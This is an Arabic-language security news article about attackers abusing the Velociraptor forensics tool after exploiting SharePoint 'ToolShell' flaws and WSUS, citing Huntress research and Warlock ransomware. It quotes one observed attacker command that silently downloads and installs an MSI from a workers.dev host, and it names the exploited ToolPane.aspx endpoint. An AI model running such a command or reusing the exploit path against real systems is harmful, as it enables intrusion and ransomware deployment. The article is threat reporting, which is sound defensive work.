تتجه جهات التهديد المتطورة بشكل متزايد لاستخدام الأدوات الإدارية المشروعة كأسلحة مفضلة، بهدف التمويه ضمن أنشطة الشبكة العادية. وقد أبرزت حملة حديثة هذا الاتجاه الخطير، حيث يقوم المهاجمون بتسليح أداة Velociraptor، وهي أداة مرموقة في مجال الاستجابة للحوادث والتحقيقات الرقمية (DFIR).
من خلال نشر هذه البرمجيات، يتمكن الخصوم بفعالية من إنشاء قنوات قيادة وسيطرة (C2) خفية، مما يتيح لهم تنفيذ أوامر عشوائية والحفاظ على وصول مستمر إلى البيئات المخترقة دون إثارة الإنذارات الأمنية التقليدية. وقد شهدت الهجمات، التي رصدت خلال أواخر عام 2025، استغلال ثغرات حرجة في البنية التحتية واسعة الانتشار للمؤسسات، مستهدفة بشكل خاص خدمات تحديث خادم ويندوز (WSUS) ومايكروسوفت شير بوينت. وبمجرد الدخول، ينشر المهاجمون أداة Velociraptor لتسهيل الحركة الجانبية، وفي حالات مؤكدة، لتسليم برمجية الفدية Warlock.
استغلال أداة Velociraptor في الهجمات الأخيرة
ربط محللو أمن Huntress هذا التطوّر في أساليب العمل بعد التحقيق في ثلاث حوادث منفصلة بين شهري سبتمبر ونوفمبر. وفي التفاصيل، نجح الباحثون في ربط مؤشرات محددة، مثل اسم المضيف DESKTOP-C1N9M، بالمجموعة التهديدية ذات الدوافع المالية Storm-2603. وقد أظهر المهاجمون مستوى عالٍ من الأمن التشغيلي، حيث استخدموا أنفاق Cloudflare والملفات الثنائية الموقعة رقميًا لتجاوز دفاعات نقطة النهاية وتفادي قوائم الحظر على الشبكة. ويعكس هذا النهج المعقد، الذي يعتمد على أداة تحقيق رقمي، قدرة المهاجمين على التكيف.
سلسلة العدوى عبر شير بوينت
تتضمن سلسلة العدوى هذه استغلال سلسلة ثغرات “ToolShell” في مايكروسوفت شير بوينت. يقوم المهاجمون أولاً بتجاوز المصادقة باستخدام CVE-2025-49706 عن طريق إرسال طلبات POST HTTP مصممة خصيصًا إلى /_layouts/15/ToolPane.aspx. وإثر ذلك، يقومون بسلسلة ثغرة ثانوية لتنفيذ التعليمات البرمجية عن بعد (CVE-2025-49704) لتعديل الملفات الافتراضية مثل start.aspx إلى قشور ويب خبيثة.
توضح سجلات الوصول المريبة لـ IIS هذه الطلبات غير المصرح بها ضمن الدليل /_layouts/15/. وبمجرد تفعيل قشر الويب، يقوم المهاجمون بتنفيذ أوامر لتنزيل وتثبيت Velociraptor عبر Windows Installer. ومن الأوامر النموذجية التي لوحظت في هذه الهجمات:
msiexec /q /i https://royal-boat-bf05.qgtxtebl.workers.dev/v3.msi
يؤدي هذا التثبيت إلى تسجيل Velociraptor كخدمة نظام، مما يضمن الاستمرارية عبر عمليات إعادة التشغيل. وبجانب ذلك، تظهر عملية Autorun إنشاء خدمة التشغيل التلقائي هذه.
استعراض قوائم VS Code
لتعزيز موقعهم بشكل أكبر، يستخدم المهاجمون مثيل Velociraptor المخترق لتشغيل أوامر PowerShell المشفرة بـ Base64. تقوم هذه البرامج النصية بتنزيل Visual Studio Code (code.exe) لإنشاء أنفاق صادرة، مما يخفي بشكل فعال حركة مرورهم الخبيثة ضمن نشاط التطوير المشروع. تبرز سجلات VS Code الأحداث التي تم إنشاؤها أثناء عملية إنشاء النفق هذه، موضحة كيف يتحول المهاجمون من إساءة استخدام أداة التحقيق الرقمي إلى السيطرة الكاملة على الشبكة.
تابعونا على Google News، LinkedIn، و X للحصول على المزيد من التحديثات الفورية، وقم بتعيين CSN كمصدر مفضل في Google.